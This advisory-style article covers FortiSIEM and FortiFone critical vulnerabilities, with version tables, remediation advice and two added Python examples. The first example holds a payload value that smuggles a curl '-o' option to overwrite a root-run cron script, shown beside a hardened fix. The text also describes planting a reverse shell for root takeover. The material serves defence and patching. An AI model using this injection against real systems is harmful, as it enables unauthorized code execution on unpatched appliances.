Fortinet has issued updates to resolve critical security vulnerabilities impacting its FortiSIEM and FortiFone products. These flaws could allow unauthenticated attackers to achieve unauthorized code execution or access device configurations.
FortiSIEM Vulnerability (CVE-2025-64155)
This OS command injection vulnerability, rated 9.4 on the CVSS scale, affects FortiSIEM Supervisor and Worker nodes. It allows an unauthenticated attacker to execute unauthorized code or commands via specially crafted TCP requests.
The flaw, discovered and reported by Horizon3.ai security researcher Zach Hanley, is in practice a chain of two issues:
- An unauthenticated argument injection that yields an arbitrary file write and, through it, remote code execution as the admin user.
- A file-overwrite privilege escalation from admin to root, which fully compromises the appliance.
Specifically, the issue lies in FortiSIEM's phMonitor service (TCP port 7900), which handles health monitoring and inter-node communication. When it processes a request related to logging security events to Elasticsearch, it invokes a shell script with parameters taken from the request. Those parameters reach curl without sanitization, so an attacker can inject additional curl arguments and make it write an arbitrary file to disk in the context of the admin user.
That file write is enough for a full system takeover: the attacker writes a reverse shell into "/opt/charting/redishb.sh", a file the admin user can modify and that a cron job executes every minute with root privileges. Two weaknesses combine here, an unauthenticated network handler and a root-run script writable by a lower-privileged account, and closing either one would have broken the chain.
The phMonitor service exposes several command handlers that require no authentication, so anyone with network access to port 7900 can invoke them directly.
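The mechanism behind the argument injection, shown as an added example that is not Fortinet's or Horizon3.ai's code: the real phMonitor script is not public, so the command template, the `es_host` parameter, the `/_bulk` endpoint and the payload are assumptions chosen to illustrate the pattern. The vulnerable helper interpolates the attacker-controlled value into a shell command line and word-splits it, so a value containing a space followed by `-o` becomes a curl output option. The hardened helper validates the value against a strict allowlist and binds it to curl's `--url` option inside a fixed argv, so it can never be read as an option. Nothing here executes curl or writes a file; the functions return the argv that would be executed.

```python
"""Added example (not Fortinet or Horizon3.ai code): argument injection via an
unquoted, user-controlled parameter passed to curl, beside a hardened version.
The command template, parameter name and endpoint are illustrative assumptions."""
import re
import shlex
from typing import List

# Hypothetical shape of the vulnerable helper: the parameter is interpolated
# into a shell command line, so word splitting happens before curl sees argv.
VULN_TEMPLATE = (
    "curl -s -X POST {es_host}/_bulk "
    "-H 'Content-Type: application/x-ndjson' --data-binary @/tmp/events.ndjson"
)

# Constructed malicious value: a valid-looking host, then an injected -o that
# makes curl save the response body to a chosen path, then a second URL so the
# template's own path suffix still lands on a URL rather than on the file name.
PAYLOAD = "http://10.0.0.5:9200 -o /opt/charting/redishb.sh http://10.0.0.5:9200"

# Allowlist: scheme, host and optional port only; no spaces, no option syntax.
HOST_RE = re.compile(r"^https?://[A-Za-z0-9.\-]+(:\d{1,5})?$")


def vulnerable_argv(es_host: str) -> List[str]:
    """Build argv the way the vulnerable script does: interpolate, then split."""
    return shlex.split(VULN_TEMPLATE.format(es_host=es_host))


def is_safe_host(es_host: str) -> bool:
    """True only if the value is a bare scheme://host[:port] with no extras."""
    return HOST_RE.match(es_host) is not None


def hardened_argv(es_host: str) -> List[str]:
    """Validate first, then build a fixed argv with the value bound to --url,
    so curl treats it as a URL whatever characters it contains."""
    if not is_safe_host(es_host):
        raise ValueError(f"rejected Elasticsearch host: {es_host!r}")
    return [
        "curl", "-s", "-X", "POST",
        "--url", f"{es_host}/_bulk",
        "-H", "Content-Type: application/x-ndjson",
        "--data-binary", "@/tmp/events.ndjson",
    ]


def injected_options(argv: List[str]) -> List[str]:
    """Return any curl output-file options present in argv; their presence is
    the tell that the caller has handed the attacker an arbitrary file write."""
    hits = []
    for i, tok in enumerate(argv):
        if tok in ("-o", "--output") and i + 1 < len(argv):
            hits.append(f"{tok} {argv[i + 1]}")
    return hits


if __name__ == "__main__":
    print("vulnerable argv :", vulnerable_argv(PAYLOAD))
    print("injected options:", injected_options(vulnerable_argv(PAYLOAD)))
    try:
        hardened_argv(PAYLOAD)
    except ValueError as err:
        print("hardened        :", err)
    print("hardened argv   :", hardened_argv("http://10.0.0.5:9200"))
```

The allowlist is the actual fix; `--url` is defense in depth for the case where a future value slips past validation with a leading dash. Quoting the variable in the shell template would stop the word splitting shown here but would still let a value beginning with `-` be parsed as an option, which is why the fixed argv binds it explicitly.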
Affected FortiSIEM Versions and Remediation:
- FortiSIEM 6.7.0 through 6.7.10: Migrate to a fixed release.
- FortiSIEM 7.0.0 through 7.0.4: Migrate to a fixed release.
- FortiSIEM 7.1.0 through 7.1.8: Upgrade to 7.1.9 or above.
- FortiSIEM 7.2.0 through 7.2.6: Upgrade to 7.2.7 or above.
- FortiSIEM 7.3.0 through 7.3.4: Upgrade to 7.3.5 or above.
- FortiSIEM 7.4.0: Upgrade to 7.4.1 or above.
- FortiSIEM 7.5 and FortiSIEM Cloud are not affected.
FortiFone Vulnerability (CVE-2025-47855)
Another critical vulnerability, rated 9.3 on the CVSS scale, affects FortiFone. It could allow an unauthenticated attacker to obtain the device configuration through a specially crafted HTTP(S) request to the Web Portal page.
Affected FortiFone Versions and Remediation:
- FortiFone 3.0.13 through 3.0.23: Upgrade to 3.0.24 or above.
- FortiFone 7.0.0 through 7.0.1: Upgrade to 7.0.2 or above.
- FortiFone 7.2 is not affected.
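For checking an inventory against the two advisories, the following is an added example rather than Fortinet tooling: it encodes the affected ranges listed above for both products and returns whether a version is affected and what the remediation is, including the two FortiSIEM branches that have no fixed release. Version strings are assumed to be plain dotted numbers as the advisories print them; a fourth component, if present, is ignored and a missing one is treated as zero, which is the conservative choice for a bare branch number such as "7.2".

```python
"""Added example, not Fortinet's tooling: classify a FortiSIEM or FortiFone
version against the affected ranges published for CVE-2025-64155 and
CVE-2025-47855 and return the remediation.  Version-string handling (pad or
truncate to three numeric components) is an assumption for illustration."""
from typing import List, Optional, Tuple

Version = Tuple[int, int, int]

# (first affected, last affected, minimum fixed release) per branch, as listed
# in the advisories.  None means the branch has no fixed release: migrate.
AFFECTED = {
    "FortiSIEM": [
        ("6.7.0", "6.7.10", None),
        ("7.0.0", "7.0.4", None),
        ("7.1.0", "7.1.8", "7.1.9"),
        ("7.2.0", "7.2.6", "7.2.7"),
        ("7.3.0", "7.3.4", "7.3.5"),
        ("7.4.0", "7.4.0", "7.4.1"),
    ],
    "FortiFone": [
        ("3.0.13", "3.0.23", "3.0.24"),
        ("7.0.0", "7.0.1", "7.0.2"),
    ],
}


def parse_version(text: str) -> Version:
    """'7.2.3' -> (7, 2, 3); '7.5' -> (7, 5, 0).  Raises on non-numeric input."""
    parts = text.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a dotted numeric version: {text!r}")
    nums = [int(p) for p in parts[:3]]
    while len(nums) < 3:
        nums.append(0)
    return nums[0], nums[1], nums[2]


def assess(product: str, version: str) -> Tuple[bool, Optional[str]]:
    """Return (affected, remediation).  The remediation is the minimum fixed
    release in the same branch, the migrate instruction when the branch has
    none, or None when the version is not affected."""
    if product not in AFFECTED:
        raise ValueError(f"unknown product: {product!r}")
    current = parse_version(version)
    for first, last, fixed in AFFECTED[product]:
        if parse_version(first) <= current <= parse_version(last):
            if fixed is None:
                return True, "migrate to a fixed release"
            return True, f"upgrade to {fixed} or above"
    return False, None


def report(inventory: List[Tuple[str, str, str]]) -> List[str]:
    """One line per (hostname, product, version) entry that needs action."""
    lines = []
    for host, product, version in inventory:
        affected, action = assess(product, version)
        if affected:
            lines.append(f"{host}: {product} {version} affected, {action}")
    return lines


if __name__ == "__main__":
    # Constructed inventory for the demo; not real hosts.
    sample = [
        ("siem-super-01", "FortiSIEM", "7.2.3"),
        ("siem-worker-02", "FortiSIEM", "7.2.7"),
        ("siem-legacy", "FortiSIEM", "6.7.10"),
        ("siem-cloud", "FortiSIEM", "7.5"),
        ("phone-lobby", "FortiFone", "3.0.13"),
        ("phone-ops", "FortiFone", "7.2.0"),
    ]
    for line in report(sample):
        print(line)
```

Because a FortiSIEM deployment mixes Supervisor, Worker and Collector nodes on one release train, run this against every node rather than only the Supervisor; a single unpatched Worker still exposes the phMonitor handlers.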
Recommendations
Users are advised to upgrade to the fixed releases listed above. The FortiSIEM 6.7 and 7.0 branches have no fixed release, so deployments on those versions need to migrate to a supported branch rather than wait for a patch. Where an immediate upgrade is not possible, Fortinet's workaround for CVE-2025-64155 is to limit access to the phMonitor port (TCP 7900), in practice to the other FortiSIEM nodes that rely on it for inter-node communication, since the vulnerable handlers can be reached without authentication by anything that can connect to the port.